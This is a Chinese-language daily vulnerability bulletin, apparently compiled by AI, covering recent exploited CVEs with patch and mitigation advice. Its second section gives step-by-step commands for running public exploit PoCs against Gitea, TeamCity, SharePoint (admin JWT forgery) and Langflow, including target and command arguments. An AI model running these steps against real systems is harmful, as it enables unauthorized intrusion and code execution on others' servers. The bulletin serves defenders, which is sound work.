每日安全情报报告
由 AI 整理发布
覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章(2026-08-30 至 2026-09-01)
风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危
🔥 标注「在野利用」= 已有真实攻击活动,需优先处置
一、最新高危漏洞
本期聚焦 2026-08-30 至 2026-09-01 披露/升级的高危漏洞,并重申仍在被利用的存量严重漏洞(PaperCut 链于 8/31 正式入 CISA KEV,Cisco FMC 零日入 KEV,ServiceNow 三枚未认证 CVSS 10.0 遭积极利用)。
🔴 在野利用 CVE-2026-81578 / CVE-2026-82078 --- PaperCut NG/MF 零日 RCE 链(8/31 入 CISA KEV)
- 漏洞类型 :CVE-2026-81578(CWE-306 关键功能缺失认证,CVSS 4.0 8.8 )+ CVE-2026-82078(CWE-470 不安全动态类加载,CVSS 4.0 9.4)
- 受影响组件:PaperCut NG / MF 全部在售版本(24/25/26 分支,8 月 27 日前构建)
- 风险说明 :两漏洞可组合实现未认证远程代码执行------CVE-2026-81578 绕过 Web 管理界面鉴权篡改配置,CVE-2026-82078 加载任意 Java 类执行主机命令(Windows 下默认以 SYSTEM 运行)。
- 在野状态 :PaperCut 于 8/31 确认已在多客户环境被利用(部署 SimpleHelp 代理为 LocalSystem「Remote Access Service」、异常 AnyDesk 落地)。首个应急补丁(Release 1)已被绕过,须升级至 Emergency Patch Release 2(8/28):NG/MF v24.1.10 / v25.0.13 / v26.0.5。加拿大 CCCS、芬兰 NCSC-FI、CISA 均已将其纳入 KEV。
- 参考链接 :PaperCut 官方紧急公告 · NVD: CVE-2026-81578 · NVD: CVE-2026-82078
🔴 在野利用 CVE-2026-20316 --- Cisco Secure Firewall Management Center(FMC)零日(入 CISA KEV)
- 漏洞类型:静态凭据缺陷,可致敏感数据泄露(与关键漏洞 CVE-2026-20079 可链式利用)
- 受影响组件:Cisco FMC 相关版本(详见厂商公告)
- 风险说明 :CISA 已将 Cisco FMC 零日漏洞 CVE-2026-20316 列入 KEV 目录,确认遭积极利用,攻击者借助默认/静态凭据读取敏感配置与数据。
- 参考链接 :FreeBuf 早报(含 CVE-2026-20316 KEV 说明) · CISA 已知被利用漏洞目录
🔴 ServiceNow 三枚未认证代码注入漏洞(CVSS 10.0,积极利用中)
- 漏洞类型:未认证代码注入 → 远程代码执行 / 未授权数据篡改(厂商 8/31 披露,CVE 跟踪中)
- 受影响组件:ServiceNow 平台(自托管客户须应用对应 hotfix;托管实例已由厂商修复)
- 风险说明 :多家情报源(Border Cyber Group、SecurityIntel 09-01)报告攻击者正积极针对 ServiceNow 平台利用三枚未认证代码注入漏洞(CVSS 评级 10.0),可实现 RCE 与数据操纵。自托管客户须按发布分支应用精确修复。
- 参考链接 :Border Cyber Group 8/31 情报简报 · SecurityIntel 09-01 简报
🟠 CVE-2026-66066 --- Ruby on Rails Active Storage 严重漏洞(公开利用细节)
- 漏洞类型:Active Storage(libvips)相关远程代码执行 / 任意文件读取(CWE-94)
- 受影响组件:使用 Active Storage + 不受信任图片上传的 Rails 应用
- 风险说明 :Enigma 8/31 情报显示该 Rails 严重漏洞(代号 KindaRails2Shell 相关)公开攻击细节已可用;另存在「任意文件读取 → RCE」利用路径。须升级并排查已存储的上传产物、轮换应用进程可读密钥。
- 参考链接 :Enigma 8/31 每日威胁情报
🔴 CVE-2026-82329 --- JFrog Artifactory 默认配置未认证管理员提权(CVSS 9.8)
- 漏洞类型:不当认证(CWE-287),默认配置下未认证攻击者可获管理权限
- 受影响组件:JFrog Artifactory 7.111.0--7.111.20、7.117.0--7.117.27、7.125.0--7.125.19、7.133.0--7.133.28、7.146.0--7.146.36、7.161.0--7.161.19
- 风险说明 :软件供应链核心组件------一旦管理员沦陷即可投毒制品、窃取签名材料与 CI/CD 凭据。云环境已由厂商加固;自托管实例须升级至修复版本:7.111.21 / 7.117.28 / 7.125.20 / 7.133.29 / 7.146.38 / 7.161.20。目前无公开武器化 PoC,但利用面极简,武器化风险高。
- 参考链接 :JFrog 安全公告 · NVD: CVE-2026-82329 · BlackTree 技术分析
- 关联 KEV :CVE-2026-66384(Artifactory Docker 缓存路径遍历,CVSS 5.3,CISA KEV 8/27,截止 9/10)--- NVD 详情
🔴 CVE-2026-19286 --- IBM Langflow OSS 未认证 RCE(A2A 端点,CVSS 9.8,公开 PoC)
- 漏洞类型:A2A 公开端点代码执行策略执行不足(CWE-94)
- 受影响组件:IBM Langflow OSS 1.0.0 至 1.11.1(A2A 端点默认启用)
- 风险说明 :未认证远程攻击者经公开 A2A 端点执行任意代码,窃取 API Key、模型凭据并横向移动;修复版本 1.12.0。公开 PoC 已可用,预计将出现自动化扫描。
- 参考链接 :IBM 官方支持节点 · NVD: CVE-2026-19286
🔴 在野利用 CVE-2026-60004 --- Gitea diffpatch Git Hook 注入 RCE(持续在野)
- 漏洞类型 :diffpatch 端点 Git hook 注入(CWE-94),CVSS 9.8
- 受影响组件:Gitea ≥ 1.17.0 且 < 1.27.1(默认开放注册时可达预认证利用)
- 风险说明 :截至 8/27 已有 8,393 台公网暴露实例被判定脆弱;任何具备仓库写权限(或开放注册下自注册)的账户均可经 diffpatch 注入 hook 执行命令。须升级至 1.27.1 并关闭不必要的公开注册。
- 参考链接 :NVD: CVE-2026-60004 · GitHub 安全公告 GHSA-rcr6-4jqh-j84m
🔴 在野利用 CVE-2026-72529 / CVE-2026-72530 --- TrueConf Server 零日(KEV,截止 9/3)
- 漏洞类型:CVE-2026-72529(缺失认证,未认证脚本执行,4307/TCP)/ CVE-2026-72530(代码注入 + 沙箱逃逸 → RCE)
- 受影响组件:TrueConf Server(自托管音视频/通讯平台)
- 风险说明 :CISA 8/21 纳入 KEV,要求 FCEB 于 9/3 前修复;Kaspersky 指 Head Mare 自 7 月起利用两漏洞替换客户端安装包投毒。
- 参考链接 :GeekFeed 报道 · CISA KEV 目录
🟠 WordPress 五大插件/主题高危漏洞(NCSC-FI 预警,CVSS 最高 10.0)
- GiveWP CVE-2026-82222(PHP 对象注入 → 未认证 RCE,≤ 4.16.7.1,修复 4.16.7.2)
- WPMU DEV Dashboard CVE-2026-76581(SSO 配置错误 → 未认证管理员接管)
- Avada CVE-2026-18431(任意文件写入 → 配合 Fusion Builder RCE)
- TranslatePress CVE-2026-19632(暴露密码重置 URL)
- Pods CVE-2026-19598(权限提升至管理员)
- 参考链接 :The Hacker News 报道 · Enigma 8/30 每日情报
🟠 CVE-2026-31694 --- Linux FUSE 页缓存本地提权(PoC 已公开,FreeBuf 已复现)
- 漏洞类型:FUSE readdir 页缓存超大目录项越界写(CWE 内存破坏),本地低权限 → root
- 受影响组件 :Linux 内核 6.15./ 6.16. / 6.17.* / 6.18 ≤ 6.18.25 / 7.0 ≥ 7.0.2 等
- 风险说明 :恶意 FUSE 服务可触发 24 字节受控越界写,完全接管系统;PoC 与细节已公开。临时缓解:限制
/dev/fuse访问、禁用非特权 user namespace。 - 参考链接 :FreeBuf 已复现分析
🔥 仍在处置窗口的存量「在野利用」严重漏洞(重申)
- Oracle WebLogic / HTTP Server CVE-2026-21962 (CVSS 10.0,KEV,1 月即遭利用、8/24 入 KEV)--- NVD 详情
- macOS 屏幕共享 CVE-2026-65400 (CVSS 9.8,KEV,root + 门罗币挖矿)--- NVD 详情
- VMware vCenter CVE-2026-59310 (CVSS 9.8,KEV,47 国 361 IP,Babuk 衍生勒索)--- NVD 详情
- Windows IKE CVE-2026-33824 (CVSS 9.8,KEV,预认证 RCE,UDP 500/4500)--- NVD 详情
- SharePoint CVE-2026-55040 (CVSS 9.1,KEV,JWT 伪造链 RCE)--- NVD 详情
- TeamCity CVE-2026-63077 (CVSS 9.8,KEV,未认证 RCE)--- NVD 详情
- MLflow CVE-2026-64849 (CVSS 9.3,SSRF 窃取云凭据,在野扫描)--- NVD 详情
- Zimbra CVE-2026-73570 (CVSS 8.9,SNMP 命令注入,270+ 服务器失陷)--- NVD 详情
- ownCloud CVE-2023-49105 (CVSS 9.8,KEV,8/30 截止)/ Linux 内核 IPv6 CVE-2026-53362 (CVSS 7.8,KEV,AI 代理用于容器逃逸,8/30 截止)--- CISA KEV 目录
二、最新漏洞 PoC(含使用步骤)
⚠️ 以下 PoC 仅供授权环境的防御验证、检测工程与安全研究使用;对他人系统运行可能违法。
1. Gitea CVE-2026-60004 --- diffpatch Git Hook 注入 RCE(Python,仅标准库)
- 来源仓库 :github.com/imbas007/CVE-2026-60004-POC
- 使用步骤 :
```bash1. 克隆仓库
git clone https://github.com/imbas007/CVE-2026-60004-POC.git
cd CVE-2026-60004-POC
2. 依赖:Python 3.7+,无需 pip 安装(仅标准库)
3. 全自动化:注册账户 + 建仓 + 注入 hook + 取回结果
python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode full-auto --cmd "id"
4. 仅检测(非侵入,不触发利用)
python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode check
````` - 修复:升级 Gitea ≥ 1.27.1 并关闭不必要的公开注册;检测日志中```POST .../diffpatch` 高频请求。
2. TeamCity CVE-2026-63077 --- Rapid7 官方 PoC(未认证 RCE)
- 来源仓库 :github.com/sfewer-r7/CVE-2026-63077
- 使用步骤 :
```bash1. 克隆仓库
git clone https://github.com/sfewer-r7/CVE-2026-63077.git
cd CVE-2026-63077
2. 安装依赖
pip install requests
3. 对目标执行命令
python3 CVE-2026-63077.py --target http://192.168.86.171:8111 --cmd "id"
````` - 攻击链:未认证 agent 注册 → 向```/app/agents/v1/commands/error` POST 恶意 XML → XStream 反序列化 → 写入 JSP → 回显执行。
3. SharePoint CVE-2026-55040 --- Rapid7 官方 PoC(JWT 伪造)
- 来源仓库 :github.com/sfewer-r7/CVE-2026-55040
- 使用步骤 :
```bash1. 克隆仓库
git clone https://github.com/sfewer-r7/CVE-2026-55040.git
cd CVE-2026-55040
2. 安装依赖
pip install pyjwt requests
3. 以目标站点管理员身份伪造 JWT(--user 支持 SID / UPN)
python3 CVE-2026-55040.py --target https://victim-sharepoint --user S-1-5-21-xxx-500
````` - 利用后```IsSiteAdmin:true`;链式 CVE-2026-63520 可进一步未认证 RCE。
4. IBM Langflow CVE-2026-19286 --- 公开 PoC(A2A 端点 RCE)
- 来源仓库 :github.com/rmhowe425/POC-CVE-2026-19286
- 使用步骤 :
```bash1. 克隆仓库
git clone https://github.com/rmhowe425/POC-CVE-2026-19286.git
cd POC-CVE-2026-19286
2. 安装依赖(按仓库 README;通常为 requests)
pip install requests
3. 向暴露的 A2A 端点发送载荷验证(仅授权环境)
python3 poc.py --url http://TARGET:7860 --cmd "id"
````` - 防御侧:升级至 1.12.0,设置```LANGFLOW_DISABLE_A2A=true,限制 A2A 端点网络可达性,审计/api日志中a2a` 请求。
5. PaperCut CVE-2026-81578 / CVE-2026-82078 --- 防御性检测工具包
- 来源 :github.com/virologi-info/papercut-toolkit(防御向,非攻击利用)
- 使用步骤 :
```bash1. 获取工具包(仅做暴露面/版本/IOC 检查)
git clone https://github.com/virologi-info/papercut-toolkit.git
cd papercut-toolkit
2. 检查 PaperCut 服务器暴露面(无破坏)
python3 papercut-exposure-checker.py --url https://print.server:9191
3. 按版本评估是否低于补丁构建
python3 papercut-exposure-checker.py --version 25.0.11.75758
```
- ⚠️ 首个应急补丁(Release 1)已被绕过,必须升级至 Emergency Patch Release 2;公网可达的 PaperCut 应用服务器应先以防火墙/ACL 限制管理界面访问,并排查 SimpleHelp/AnyDesk 异常落地。
6. JFrog Artifactory CVE-2026-82329 --- 检测与配置核查(暂无公开攻击 PoC)
- 检测/核查步骤 :
```bash1. 确认版本是否已升级至修复构建
curl -k https://artifactory.example.com/artifactory/api/system/version
2. 核查管理接口可达性(应仅对可信管理网/运维主机开放)
修复版本:7.111.21 / 7.117.28 / 7.125.20 / 7.133.29 / 7.146.38 / 7.161.20
3. 审查近期新增特权用户、令牌变更、意外远程仓库与配置导出
```
- 临时缓解:限制 administration / repository 接口网络可达性,轮换可能暴露的 CI/CD 凭据与签名材料。
三、网络安全最新文章
-
FreeBuf 早报(2026-09-01)--- CISA《CI Fortify》六步隔离蓝图;Microsoft Word Copilot 蠕虫;Cisco FMC CVE-2026-20316 入 KEV;Ruflo MCP CVE-2026-59726(CVSS 10.0)
五眼联盟发布关键基础设施网络攻击隔离指南;Word Copilot 隐藏提示词可催生自传播 AI 蠕虫;Cisco FMC 零日遭积极利用入 KEV;Ruflo 框架 MCP 桥接器未认证 RCE。
-
SecurityIntel 每日简报(2026-09-01)--- 中国 Fire Ant 劫持 Cisco IOS XR 路由器;ServiceNow 三枚严重代码注入;Nightmare Eclipse「HardBreacher」;McKesson 数据泄露
中国背景组织 Fire Ant 借未授权 GRE 隧道劫持 Cisco IOS XR 路由器并致盲安全日志;ServiceNow 平台遭三枚未认证代码注入积极利用;ShinyHunters 宣称窃取 McKesson 2.84 亿条记录。
-
FreeBuf 已复现 --- Linux FUSE 页缓存本地提权漏洞(CVE-2026-31694)
详细复现 FUSE readdir 页缓存超大目录项越界写(24 字节受控越界),本地低权限可完全接管系统;给出影响版本、上游补丁与临时缓解措施。
-
Border Cyber Group --- 关键基础设施威胁情报简报(2026-08-31)
本期最高优先:PaperCut NG/MF 确认在野利用并入 KEV;Boston Scientific 运营受损;McKesson 第三方应用数据外泄;ServiceNow 披露三枚未认证 CVSS 10.0 漏洞;Rails Active Storage 严重漏洞公开利用细节。
-
Enigma Global --- 每日威胁情报摘要(2026-08-31)
总结当日 15 枚漏洞(13 严重):Gitea CVE-2026-60004 在野(8,393 台暴露实例脆弱)、TerminalFix 伪造 Cloudflare CAPTCHA 反向隧道攻击、针对中印的税务钓鱼投送 PackClient RAT;并提示审计
@7nohe/openapi-react-query-codegennpm 投毒与 AI 会话凭证被盗。 -
ByteVanguard --- 每周威胁简报(2026-09-01):Gitea RCE 与一枚老旧 Oracle 漏洞
复盘 CISA 截至 8/30 单周新增 11 条 KEV 背后的「确认利用 → 确认入册」时间差问题:Oracle WebLogic CVE-2026-21962 1 月即遭利用、8 月才入 KEV(约 7 个月滞后),揭示披露与处置之间的治理缺口。
部分内容由 AI 辅助生成